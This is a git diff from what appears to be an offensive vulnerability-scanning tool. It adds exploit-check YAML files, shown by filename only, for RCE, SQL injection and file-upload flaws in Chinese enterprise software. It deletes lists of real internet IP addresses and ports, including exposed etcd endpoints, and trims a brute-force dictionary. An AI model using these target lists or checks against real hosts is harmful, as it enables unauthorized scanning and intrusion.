"config/51pwn/yaml/\345\215\216\344\270\272\350\267\257\347\224\261\345\231\250/huawei-hg255s-lfi.yaml" create mode 100755 "config/51pwn/yaml/\345\215\216\344\270\272\350\267\257\347\224\261\345\231\250/huawei-hg659-lfi.yaml" create mode 100755 "config/51pwn/yaml/\345\244\247\345\224\220\347\224\265\344\277\241AC/CNVD-2021-04128.yaml" create mode 100755 "config/51pwn/yaml/\345\244\251\350\236\215\344\277\241NGFW4000(TG-1509)/NGFW4000-DeafultPass.yaml" create mode 100755 "config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-Gateway-FileDownlaod.yaml" create mode 100755 "config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-Gateway-InfoLeak.yaml" create mode 100755 "config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-audit_db-Downlaod.yaml" create mode 100755 "config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-monitor_db-Downlaod.yaml" create mode 100755 "config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-policy_db-Downlaod.yaml" create mode 100755 "config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-product_db-Downlaod.yaml" create mode 100755 "config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WebGateway-ifcfg_db-Downlaod.yaml" create mode 100755 "config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD-LoginBypass.yaml" create mode 100755 "config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_bytecache_run_action_php-RCE.yaml" create mode 100755 "config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_change_lan_php-FileRead.yaml" create mode 100755 "config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_change_lan_php-RCE.yaml" create mode 100755 "config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_download_php-FileDownload.yaml" create mode 100755 "config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_enable_tool_debug_php-RCE.yaml" create mode 100755 "config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_getMacAddr_php-RCE.yaml" create mode 100755 "config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_static_arp_include_php-SQLi.yaml" create mode 100755 "config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\347\275\221\347\273\234\345\215\253\345\243\253\345\256\211\345\205\250\345\256\241\350\256\241\347\263\273\347\273\237/SecurityCheckerSys-Unauth-DownloadLogs.yaml" create mode 100755 "config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\350\264\237\350\275\275\345\235\207\350\241\241\347\263\273\347\273\237/Front-NoCondition-RCE.yaml" create mode 100755 "config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\350\264\237\350\275\275\345\235\207\350\241\241\347\263\273\347\273\237/LBS-LFR.yaml" create mode 100755 "config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\350\264\237\350\275\275\345\235\207\350\241\241\347\263\273\347\273\237/LBS-SQLi.yaml" create mode 100755 "config/51pwn/yaml/\345\245\275\350\247\206\351\200\232\350\247\206\351\242\221\344\274\232\350\256\256\347\263\273\347\273\237/hanming-lfr.yaml" create mode 100755 "config/51pwn/yaml/\345\256\235\345\241\224/BT742-PMA-UnauthorizedAccess.yaml" create mode 100755 "config/51pwn/yaml/\345\270\235\345\233\275EmpireCMS/CNVD-2021-15824.yaml" create mode 100755 "config/51pwn/yaml/\346\230\237\347\275\221\351\224\220\346\215\267\350\247\206\351\242\221\350\257\235\346\234\272/ruijie-info-pwdsetting.yaml" create mode 100755 "config/51pwn/yaml/\346\255\243\346\226\271\346\225\231\345\212\241\347\256\241\347\220\206\347\263\273\347\273\237/demo.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/E_cology-sqli-Page.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/E_cology-sqli-login.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-rce-WorkflowServiceXml.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-BlogService.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-HrmCareerApplyPerEdit.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-HrmCareerApplyPerView.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-HrmCareerApplyWorkEdit.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-HrmCareerApplyWorkView.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-MobileService.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-SignatureDownLoad.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-users_data-Unauthorized.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/Fangwei-OA-AdminLogin.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-arbitrary-fileUpload.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-fileDownload-directoryTraversal.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-javabeanshell-rce.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-springframework-directoryTraversal.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-syncuserinfo-sqli.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-v8-sqli.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-v9-fileUpload.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-weaver_common-fileUpload.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-workflowcentertreedata-sqli.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2014-076418.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2014-076547.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2015-0125638_2.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2015-0126024_1.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2015-0130759.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2015-0136818.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2015-0136933.yaml" create mode 100755 "config/51pwn/yaml/\346\263\233\345\276\256\344\272\221\346\241\245 e-Bridge/E_bridge-lfi-saveYZJFile.yaml" create mode 100755 "config/51pwn/yaml/\346\267\261\344\277\241\346\234\215\347\273\210\347\253\257\346\243\200\346\265\213\345\223\215\345\272\224\345\271\263\345\217\260(EDR)/CNVD-2020-46552.yaml" create mode 100755 "config/51pwn/yaml/\346\267\261\344\277\241\346\234\215\347\273\210\347\253\257\346\243\200\346\265\213\345\223\215\345\272\224\345\271\263\345\217\260(EDR)/sangfor-edr-auth-bypass.yaml" create mode 100755 "config/51pwn/yaml/\346\267\261\344\277\241\346\234\215\347\273\210\347\253\257\346\243\200\346\265\213\345\223\215\345\272\224\345\271\263\345\217\260(EDR)/sangfor-edr-rce.yaml" create mode 100755 "config/51pwn/yaml/\346\267\261\344\277\241\346\234\215\350\241\214\344\270\272\346\204\237\347\237\245\347\263\273\347\273\237(BA)/sangfor-ba-rce.yaml" create mode 100755 "config/51pwn/yaml/\347\210\261\345\256\242CMS/CNVD-2019-13870.yaml" create mode 100755 "config/51pwn/yaml/\347\210\261\345\256\242CMS/CNVD-2019-13871.yaml" create mode 100755 "config/51pwn/yaml/\347\210\261\345\256\242CMS/CNVD-2019-14600.yaml" create mode 100755 "config/51pwn/yaml/\347\210\261\345\256\242CMS/CNVD-2019-16769.yaml" create mode 100755 "config/51pwn/yaml/\347\210\261\345\256\242CMS/CNVD-2019-17061.yaml" create mode 100755 "config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms-admin-page-getshell.yaml" create mode 100755 "config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms_2link_edit_sqli.yaml" create mode 100755 "config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms_v2-add-upload.yaml" create mode 100755 "config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms_v2-admin-File-Upload.yaml" create mode 100755 "config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms_v2-admin-upload.yaml" create mode 100755 "config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms_v2-caiji-upload.yaml" create mode 100755 "config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms_v2-edit-sqli.yaml" create mode 100755 "config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms_v2-nav-upload.yaml" create mode 100755 "config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms_v2-poster-editphp-time-blind.yaml" create mode 100755 "config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms_v2-xss.yaml" create mode 100755 "config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms_v2_notice_edit_sqli.yaml" create mode 100755 "config/51pwn/yaml/\347\213\256\345\255\220\351\261\274/shiziyu-ApigoodsController-sqlinjection.yaml" create mode 100755 "config/51pwn/yaml/\347\213\256\345\255\220\351\261\274/shiziyu-apicontroller-sqlinjection.yaml" create mode 100755 "config/51pwn/yaml/\347\213\256\345\255\220\351\261\274/shiziyu-image_upload-fileupload.yaml" create mode 100755 "config/51pwn/yaml/\347\213\256\345\255\220\351\261\274/shiziyu-wxapp-fileupload.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213CRM/TruboCRM-sqli-forgetpswd.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2010-0136925.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2010-0162149.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2010-076114.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2010-083458.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2015-0137238.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2015-0137503.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2015-0137503_2.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213CRM/wooyun-2015-0162117.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213ERP-U8/wooyun-2015-013006.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213ERP-U8/wooyun-2015-0157215.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213ERP-U8/wooyun-2015-156891_1.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213ERP-U8/wooyun-2015-156891_2.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213ERP-U8/yonyou_U8-upload-FileUpload.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213GRP-U8R10/wooyun-2010-0108912.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213ICC/wooyun-2010-057130.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213ICC/yonyou_ICC-download-getfile.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213NC-IUFO/yonyou_NC_IUFO-sqli-publishinfodetail.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213NC/CNVD-2021-30167.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213NC/Yonyou-GRP_U8-SqliToRce.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213NC/YonyouNc-Arbitrary-FileUpload.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213NC/YonyouNc-Directory-Traversal.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213NC/YonyouU8-OA-Sqli.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213NC/wooyun-2010-0112834.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213NC/wooyun-2014-060988.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213NC/wooyun-2015-0124173.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213NC/yonyou_NC-info-ActionServlet.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213NC/yonyou_NC-sqli-attach_download_d.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213NC/yonyou_sqli_LoginUI.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213\344\272\272\345\212\233\350\265\204\346\272\220\347\256\241\347\220\206\347\263\273\347\273\237\357\274\210e-HR\357\274\211/wooyun-2014-066512.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213\344\272\272\345\212\233\350\265\204\346\272\220\347\256\241\347\220\206\347\263\273\347\273\237\357\274\210e-HR\357\274\211/wooyun-2014-078679.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213\344\272\272\345\212\233\350\265\204\346\272\220\347\256\241\347\220\206\347\263\273\347\273\237\357\274\210e-HR\357\274\211/wooyun-2015-096676.yaml" create mode 100755 "config/51pwn/yaml/\347\224\250\345\217\213\344\272\272\345\212\233\350\265\204\346\272\220\347\256\241\347\220\206\347\263\273\347\273\237\357\274\210e-HR\357\274\211/yonyou_EHR-xxe-smartweb2.yaml" create mode 100755 "config/51pwn/yaml/\347\246\205\351\201\223/Changdao-165-SQLi.yaml" create mode 100755 "config/51pwn/yaml/\347\273\207\346\242\246\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237 (DedeCMS)/CVE-2018-18608.yaml" create mode 100755 "config/51pwn/yaml/\347\273\207\346\242\246\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237 (DedeCMS)/CVE-2018-6910.yaml" create mode 100755 "config/51pwn/yaml/\347\273\207\346\242\246\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237 (DedeCMS)/CVE-2018-7700.yaml" create mode 100755 "config/51pwn/yaml/\347\273\207\346\242\246\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237 (DedeCMS)/dedecms-carbuyaction-fileinclude.yaml" create mode 100755 "config/51pwn/yaml/\347\273\207\346\242\246\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237 (DedeCMS)/dedecms-config-xss.yaml" create mode 100755 "config/51pwn/yaml/\347\273\207\346\242\246\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237 (DedeCMS)/dedecms-guestbook-sqli.yaml" create mode 100755 "config/51pwn/yaml/\347\273\207\346\242\246\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237 (DedeCMS)/dedecms-membergroup-sqli.yaml" create mode 100755 "config/51pwn/yaml/\347\273\207\346\242\246\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237 (DedeCMS)/dedecms-openredirect.yaml" create mode 100755 "config/51pwn/yaml/\347\273\277\347\233\237\347\273\274\345\220\210\345\250\201\350\203\201\346\216\242\351\222\210\357\274\210NSFOCUS UTS\357\274\211/lvmeng-uts-disclosure.yaml" create mode 100755 "config/51pwn/yaml/\347\275\221\345\272\267\344\270\213\344\270\200\344\273\243\351\230\262\347\201\253\345\242\231/Netentsec-Ngfw-Rce.yaml" create mode 100755 "config/51pwn/yaml/\347\275\221\345\272\267\344\272\222\350\201\224\347\275\221\346\216\247\345\210\266\347\275\221\345\205\263ns-icg/CNVD-2016-08603.yaml" create mode 100755 "config/51pwn/yaml/\347\276\244\347\273\204\345\257\271\350\256\262\346\234\215\345\212\241\351\205\215\347\275\256\345\271\263\345\217\260/HikvisionIntercom-Service-DefaultPassword.yaml" create mode 100755 "config/51pwn/yaml/\350\207\264\350\277\234OA/CNVD-2019-19299.yaml" create mode 100755 "config/51pwn/yaml/\350\207\264\350\277\234OA/CNVD-2020-62422.yaml" create mode 100755 "config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2010-0105709.yaml" create mode 100755 "config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2010-0110312.yaml" create mode 100755 "config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0100472.yaml" create mode 100755 "config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0105502.yaml" create mode 100755 "config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0105709.yaml" create mode 100755 "config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0106478.yaml" create mode 100755 "config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0107543.yaml" create mode 100755 "config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0108235.yaml" create mode 100755 "config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0110538.yaml" create mode 100755 "config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0157458.yaml" create mode 100755 "config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2016-0170297.yaml" create mode 100755 "config/51pwn/yaml/\350\207\264\350\277\234OA/zhiyuan-file-upload.yaml" create mode 100755 "config/51pwn/yaml/\350\207\264\350\277\234OA/zhiyuan-oa-unauthorized.yaml" create mode 100755 "config/51pwn/yaml/\350\223\235\345\207\214OA/CNVD-2021-28277.yaml" create mode 100755 "config/51pwn/yaml/\351\200\232\350\276\276OA/Tongda-OA-FileInclude.yaml" create mode 100755 "config/51pwn/yaml/\351\200\232\350\276\276OA/tongda-meeting-unauthorizedAccess.yaml" create mode 100755 "config/51pwn/yaml/\351\200\232\350\276\276OA/tongda-session-disclosure.yaml" create mode 100755 "config/51pwn/yaml/\351\207\221\345\261\261V8+\347\273\210\347\253\257\345\256\211\345\205\250\347\263\273\347\273\237/kingsoft-v8-default-login.yaml" create mode 100755 "config/51pwn/yaml/\351\207\221\345\261\261V8+\347\273\210\347\253\257\345\256\211\345\205\250\347\263\273\347\273\237/kingsoft-v8-file-read.yaml" create mode 100755 "config/51pwn/yaml/\351\207\221\350\235\266OA/kingdee-eas-DirectoryTraversal.yaml" create mode 100755 "config/51pwn/yaml/\351\230\277\351\207\214 Druid \346\225\260\346\215\256\345\272\223\350\277\236\346\216\245\346\261\240/druid-console-exposure.yaml" create mode 100755 "config/51pwn/yaml/\351\252\221\345\243\253CMS\357\274\21074CMS\357\274\211/74cms-SQLi-1.yaml" create mode 100755 "config/51pwn/yaml/\351\252\221\345\243\253CMS\357\274\21074CMS\357\274\211/74cms-SQLi-2.yaml" create mode 100755 "config/51pwn/yaml/\351\252\221\345\243\253CMS\357\274\21074CMS\357\274\211/74cms-front-desk-getshell.yaml" create mode 100755 "config/51pwn/yaml/\351\252\221\345\243\253CMS\357\274\21074CMS\357\274\211/CVE-2020-22210.yaml" create mode 100755 "config/51pwn/yaml/\351\275\220\345\215\232CMS/Qibocms-SQLi.yaml" create mode 100755 "config/51pwn/yaml/\351\275\220\346\262\273\345\240\241\345\236\222\346\234\272/CNVD-2019-27717.yaml" create mode 100644 geCurIp_test.go create mode 100644 lib/util/geCurIp.go diff --git a/ZXRjZAo=.txt b/ZXRjZAo=.txt deleted file mode 100644 index 530551d23..000000000 --- a/ZXRjZAo=.txt +++ /dev/null @@ -1,100 +0,0 @@ -https://2600:9000:201d:3400:11:ad80:9fc0:93a1:443 -https://2600:9000:20d1:2c00:7:a6e2:5dc0:93a1:443 -https://154.3.248.167:1723 -https://2600:9000:2182:e600:16:4218:c780:93a1:443 -https://2600:9000:201e:f200:18:513f:1240:93a1:443 -https://45.60.146.172:8098 -https://2600:9000:201b:9000:9:e3af:fc40:93a1:443 -https://2600:9000:201e:f600:1c:27c2:3b00:93a1:443 -https://107.154.195.84:50000 -https://45.60.230.39:7474 -https://2600:9000:201d:e800:a:34ce:56c0:93a1:443 -https://85.187.182.33:80 -https://155.159.88.91:8888 -https://2a02:e980:10::c4:9080 -https://2600:9000:2008:3400:c:b92b:bc80:93a1:443 -https://2600:9000:2018:3e00:e:1b79:55c0:93a1:443 -https://2600:9000:2182:a600:2:36a5:f7c0:93a1:443 -https://2a02:e980:10::30:8800 -https://121.205.73.165:554 -https://2600:9000:2015:d400:1a:67f:bf40:93a1:443 -https://2600:9000:2015:5c00:1c:241c:4700:93a1:443 -https://45.64.65.60:5985 -https://46.17.114.13:8880 -https://2600:9000:2041:3800:6:5309:8cc0:93a1:443 -https://2600:9000:201b:d800:1e:5091:d140:93a1:443 -https://47.93.93.16:9002 -https://2a02:e980:5::66:5222 -https://200.238.187.61:8008 -https://147.161.185.10:12000 -https://223.7.130.26:443 -https://45.60.110.70:7779 -https://45.223.222.192:20000 -https://183.89.169.103:3268 -https://108.156.249.248:443 -https://2600:9000:2008:200:12:5f6a:c2c0:93a1:443 -https://2600:9000:201d:d400:19:a249:9700:93a1:443 -https://89.97.9.223:161 -https://147.161.215.111:12000 -https://2600:9000:24bc:800:a:3fb9:5140:93a1:443 -https://2600:9000:201b:3400:1d:4f32:50c0:93a1:443 -https://45.60.139.93:5601 -https://2a02:e980:10::b3:5560 -https://2600:9000:201e:e400:a:9d82:b347:51c1:443 -https://2600:9000:2008:7e00:16:594a:cec0:93a1:443 -https://92.109.143.30:554 -https://99.243.132.197:7547 -https://107.154.176.9:2086 -https://172.101.252.44:161 -https://2600:9000:2015:a800:f:a9ec:8fc0:93a1:443 -https://45.60.106.135:8008 -https://2600:9000:2015:2000:d:d64b:9600:93a1:443 -https://81.82.150.157:80 -https://203.186.4.1:161 -https://99.247.48.87:10554 -https://107.154.113.165:9100 -https://107.154.167.181:8888 -https://54.195.209.142:80 -https://107.154.189.56:444 -https://72.89.6.241:8554 -https://121.121.202.42:4063 -https://162.220.29.64:161 -https://45.60.0.36:9443 -https://2600:9000:20d1:8c00:e:f507:e400:93a1:443 -https://93.42.9.114:161 -https://2600:9000:2042:da00:f:39fd:3d80:93a1:443 -https://2600:9000:201e:2c00:a:e15e:14c0:93a1:443 -https://186.48.161.36:52869 -https://2600:9000:2015:8600:16:9f41:ac80:93a1:443 -https://143.125.249.23:8000 -https://2600:9000:2015:2a00:17:25ca:740:93a1:443 -https://190.194.118.153:7547 -https://116.6.24.100:161 -https://181.231.96.129:7547 -https://2600:9000:201b:7a00:5:398e:ed00:93a1:443 -https://161.111.85.194:8008 -https://2600:9000:2023:4200:f:967e:9640:93a1:443 -https://12.45.129.186:8554 -https://113.194.58.118:2000 -https://2600:9000:20f4:dc00:16:5bc4:4280:93a1:443 -https://203.150.87.34:8008 -https://74.197.156.165:3702 -https://2600:9000:21c4:800:5:7d05:29c0:93a1:443 -https://2600:9000:202f:3600:14:afe3:f0c0:93a1:443 -https://2600:9000:201d:e600:8:133:c640:93a1:443 -https://2600:9000:2015:6c00:1b:ecbe:88c0:93a1:443 -https://64.59.142.250:143 -https://2600:9000:2042:fc00:19:f3d7:1480:93a1:443 -https://112.86.66.70:554 -https://24.111.7.231:161 -https://189.5.79.128:7547 -https://2a0b:2300::1:65:5060 -https://181.12.56.82:7547 -https://2600:9000:20d1:5a00:16:3e98:6b40:93a1:443 -https://2a02:e980:16::13:8888 -https://194.158.219.26:80 -https://125.237.13.57:554 -https://2600:9000:2015:5a00:16:523b:da80:93a1:443 -https://2600:9000:2015:9000:a:acaf:c780:93a1:443 -https://107.154.117.238:4911 -https://107.154.232.23:2222 diff --git a/ZXRjZCBwb3J0OjIzNzkK.txt b/ZXRjZCBwb3J0OjIzNzkK.txt deleted file mode 100644 index cc9bd9447..000000000 --- a/ZXRjZCBwb3J0OjIzNzkK.txt +++ /dev/null @@ -1,100 +0,0 @@ -https://3.143.1.107:2379 -https://202.126.149.43:2379 -https://27.17.35.250:2379 -https://172.245.237.68:2379 -https://172.245.234.1:2379 -https://172.245.237.69:2379 -https://172.245.234.191:2379 -https://172.245.234.9:2379 -https://206.233.234.20:2379 -https://172.245.234.210:2379 -https://101.200.222.130:2379 -https://172.245.237.157:2379 -https://1.15.247.140:2379 -https://3.83.204.202:2379 -https://172.245.237.188:2379 -https://42.81.157.165:2379 -https://172.245.237.180:2379 -https://35.192.85.119:2379 -https://61.147.173.26:2379 -https://172.245.237.93:2379 -https://43.133.114.205:2379 -https://172.245.237.75:2379 -https://172.245.237.154:2379 -https://172.245.237.60:2379 -https://188.227.32.42:2379 -https://198.46.131.212:2379 -https://172.245.237.122:2379 -https://173.208.172.234:2379 -https://172.245.234.179:2379 -https://120.92.79.240:2379 -https://101.200.242.29:2379 -https://172.245.234.88:2379 -https://39.106.62.180:2379 -https://172.245.237.72:2379 -https://172.245.234.199:2379 -https://47.251.6.29:2379 -https://65.108.205.60:2379 -https://141.94.215.43:2379 -https://172.245.237.252:2379 -https://172.245.237.134:2379 -https://210.211.109.186:2379 -https://34.124.131.158:2379 -https://162.55.175.84:2379 -https://172.245.237.41:2379 -https://120.48.103.220:2379 -https://172.245.237.189:2379 -https://110.40.150.63:2379 -https://172.245.237.46:2379 -https://124.71.136.172:2379 -https://172.245.234.186:2379 -https://18.222.43.184:2379 -https://172.245.237.126:2379 -https://54.237.98.7:2379 -https://128.84.159.78:2379 -https://172.245.237.70:2379 -https://47.104.104.215:2379 -https://172.245.237.155:2379 -https://172.245.234.252:2379 -https://172.245.237.100:2379 -https://172.245.234.109:2379 -https://172.245.234.229:2379 -https://172.245.234.207:2379 -https://172.245.234.171:2379 -https://172.245.234.188:2379 -https://172.245.237.119:2379 -https://172.245.234.156:2379 -https://172.245.237.244:2379 -https://172.245.237.181:2379 -https://172.245.234.104:2379 -https://172.245.237.54:2379 -https://172.245.237.102:2379 -https://172.245.237.73:2379 -https://172.245.237.196:2379 -https://172.245.234.137:2379 -https://172.245.234.33:2379 -https://172.245.237.12:2379 -https://172.245.237.142:2379 -https://172.245.234.55:2379 -https://172.245.234.124:2379 -https://172.245.234.232:2379 -https://172.245.237.148:2379 -https://172.245.237.34:2379 -https://172.245.237.27:2379 -https://172.245.237.19:2379 -https://172.245.234.157:2379 -https://172.245.234.254:2379 -https://172.245.234.194:2379 -https://146.56.234.6:2379 -https://172.245.237.249:2379 -https://172.245.237.56:2379 -https://172.245.234.68:2379 -https://172.245.237.201:2379 -https://172.245.237.106:2379 -https://172.245.234.162:2379 -https://172.245.234.111:2379 -https://172.245.237.168:2379 -https://172.245.237.91:2379 -https://172.245.237.40:2379 -https://172.245.234.141:2379 -https://120.79.84.68:2379 diff --git a/brute/dicts/softc.txt b/brute/dicts/softc.txt index 4296c9b22..816ed48d9 100644 --- a/brute/dicts/softc.txt +++ b/brute/dicts/softc.txt @@ -1,5 +1,3 @@ -阜阳市房地产管理局 -(天府)四川股权交易中心股份有限公司 0-6.com 001糖酒网 007特务商城 @@ -66,11 +64,6 @@ 1919酒类直供网 198526家政网 19楼 -1wyuncms 最新版 xxe 漏洞 -1wyuncms 最新版 xxe 漏洞 #2 -1wyuncms 最新版 xxe 漏洞 #3 -1wyuncms 最新版 前台存储型 xss -1wyuncms 最新版 前台存储型 xss #2 1号店 1米购物 2019辽宁卫视春晚直播网 @@ -117,19 +110,11 @@ 360企业安全 360化妆品网 3618med.com -361° -361°官网 -361°购物网 -361°官方商城 36524家政网 365淘房 365淘房网 365票讯网 365地产家居网 -36kr -36kr.com -36氪 -371.net 37玩 37娱乐 37游戏 @@ -271,7 +256,6 @@ A5 A5CN A8音乐网 A9VG电玩部落 -AAE全球专递 | 中国 ABBS ABBS建筑论坛 ABC小说网 @@ -303,7 +287,7 @@ BEJ48中国官方网站 BIOSTIME BITTLS.CC BOSS直聘 -BROSMANN(宝舒曼) +BROSMANN BeX5协同3处SQL注入 BeX5协同4处存储型xss BeX5协同一处xxe @@ -357,7 +341,7 @@ Colloa协同运营管理平台SQL注入 Colloa协同运营管理平台任意文件下载 Conversion CoreCooL -D-Link (友讯电子设备(上海)有限公司) +D-Link D1优尚网 D2C DBIC @@ -371,7 +355,7 @@ DNF阿拉德大陆 DNSPod DOYO通用建站程序前台任意PHP文件替换 DRC亚投行物业管理团队 -DSMmall商城系统存在另一处注入漏洞(官方演示) +DSMmall商城系统存在另一处注入漏洞 DarryRing 